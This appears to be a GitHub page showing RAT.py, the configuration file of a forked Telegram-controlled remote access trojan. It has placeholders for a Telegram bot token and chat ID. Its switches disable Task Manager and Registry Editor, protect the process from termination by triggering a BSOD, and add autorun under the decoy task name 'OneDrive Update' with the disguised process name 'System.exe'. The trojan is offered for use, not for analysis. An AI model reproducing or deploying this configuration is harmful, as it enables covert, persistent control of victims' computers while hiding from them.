forked from 5l1v3r1/Telegram-RAT
-
Notifications
You must be signed in to change notification settings - Fork 0
/
RAT.py
38 lines (26 loc) · 875 Bytes
/
RAT.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from API import *
# Token/ID
TelegramToken = 'TOKEN'
TelegramChatID = 'ID'
# Run the script as administrator
AdminRightsRequired = False
# Disable Task Manager at first start
DisableTaskManager = False
# Disable Registry Editor at first start
DisableRegistryTools = False
# Process protection from termination and deletion
ProcessBSODProtectionEnabled = False
# Add to startup at first start
AutorunEnabled = False
# Installation directory
InstallPath = 'C:\\ProgramData\\'
# Task name in Task Scheduler
AutorunName = 'OneDrive Update'
# The name of the process in the Task Manager
ProcessName = 'System.exe'
# Display a message at first start
DisplayMessageBox = False
# Your Message (will be displayed at start)
Message = 'Message'
# Directory for saving trojan temporary files
Directory = 'C:\\Windows\\Temp\\TelegramRAT\\'